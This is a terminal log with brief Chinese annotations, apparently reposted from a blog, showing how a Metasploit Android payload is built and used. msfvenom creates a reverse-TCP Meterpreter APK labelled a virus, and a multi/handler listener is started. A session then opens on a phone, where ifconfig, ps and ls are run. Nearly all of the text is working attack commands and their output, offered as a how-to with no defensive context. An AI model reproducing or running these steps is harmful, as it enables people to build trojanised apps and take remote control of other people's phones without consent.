root@kali:~# msfvenom -pandroid/meterpreter/reverse_tcp lhost=192.168.1.117 -o /root/morefun.apk
No platform was selected, choosingMsf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvikfrom the payload
No encoder or badchars specified,outputting raw payload
Payload size: 9486 bytes
Saved as: /root/morefun.apk (病毒)
root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payloadandroid/meterpreter/reverse_tcp
msf exploit(handler) > set lhost192.168.1.117 (kali linux主机)
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options(android/meterpreter/reverse_tcp):
Name CurrentSetting Required Description
---- --------------- -------- -----------
AutoLoadAndroid true yes Automatically load the Android extension
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit -j z
[*] Exploit running as background job.
[*] Started reverse TCP handler on192.168.1.117:4444
[*] Starting the payload handler...
开始监听
msf exploit(handler) > [*] Sending stage(63194 bytes) to 192.168.1.224
[*] Meterpreter session 1 opened(192.168.1.117:4444 -> 192.168.1.224:60942) at 2017-03-09 01:11:31-0500 (android手机上安装morefun.apk运行后产生session 1)
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
3 meterpreter java/android u0_a508 @ localhost 192.168.1.117:4444 -> 192.168.1.224:49711(192.168.1.224)
msf exploit(handler) > sessions -i 3 (3是session Id号码)
[*] Starting interaction with 3...
meterpreter > help (你已经能看到该android手机上。。。。。。)
meterpreter > ifconfig
Interface 10
============
Name : wlan0 - wlan0
Hardware MAC : d0:22:be:a4:7e:11
IPv4 Address : 192.168.1.224
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::d222:beff:fea4:7e11
IPv6 Netmask : ::
meterpreter > ps
meterpreter > ls
转载于:https://blog.51cto.com/2290153/1905006
65
